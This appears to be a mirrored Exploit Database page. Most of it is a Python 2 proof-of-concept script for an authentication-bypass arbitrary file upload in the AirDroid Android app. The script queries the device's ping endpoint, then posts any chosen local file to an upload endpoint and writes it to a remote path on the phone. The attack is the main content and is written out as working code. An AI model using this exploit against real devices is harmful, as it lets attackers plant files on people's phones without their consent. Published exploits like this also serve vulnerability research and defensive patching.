AirDroid – Arbitrary File Upload

• Exploit Database
• 145 阅读

• 作者： Parsa Adib
  日期： 2015-07-06
• 类别：

  • webapps
  平台：

  • android
• 来源：https://www.exploit-db.com/exploits/37504/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37

  #/IN THE NAME OF GOD #/auth====PARSA ADIB   import sys,requests,re,urllib2 def logo(): print"\t\t .__ .___ .__.___" print"\t\t_____|__|________| _/__________ |__| __| _/" print"\t\t\__\ |\___ \/ __ |\___ \/_ \||/ __ | " print"\t\t / __ \|||| \/ /_/ | || \(<_> )/ /_/ | " print"\t\t(____/__||__|\____ | |__| \____/|__\____ | " print"\t\t \/ \/\/ " print "\t\tAIRDROID VerAll UPLOAD AUTH BYPASS PoC @ Parsa Adib" if len(sys.argv)<6 or len(sys.argv)>6 : logo() print "\t\tUSAGE:python exploit.py ip port remote-file-name local-file-name remote-file-path" print "\t\tEXAMPLE:python exploit.py 192.168.1.2 8888 poc poc.txt /sdcard" else : logo() print "\n[+]Reciving Details\n-----------------------------" try : p = requests.get(&apos;http://&apos;+sys.argv[1]+&apos;:&apos;+sys.argv[2]+&apos;/sdctl/comm/ping/&apos;) except IOError : print "\n[!] Check If server is Running" sys.exit() for i in p.content.split(&apos;,&apos;) : for char in &apos;{"}_&apos;: i = i.replace(char,&apos;&apos;).upper() print "[*]"+i+"" print "\n[+]Sending File\n-----------------------------" try : r = requests.post(&apos;http://&apos;+sys.argv[1]+&apos;:&apos;+sys.argv[2]+&apos;/sdctl/comm/upload/dir?fn=&apos;+sys.argv[3]+&apos;&d=&apos;+sys.argv[5]+&apos;&after=1&fname=&apos;+sys.argv[3], files={sys.argv[4]: open(sys.argv[4], &apos;rb&apos;).read()}) if (r.status_code == 200) : print "[*]RESPONSE:200" print "[*]FILE SENT SUCCESSFULY" except IOError : print "\n[!] Error"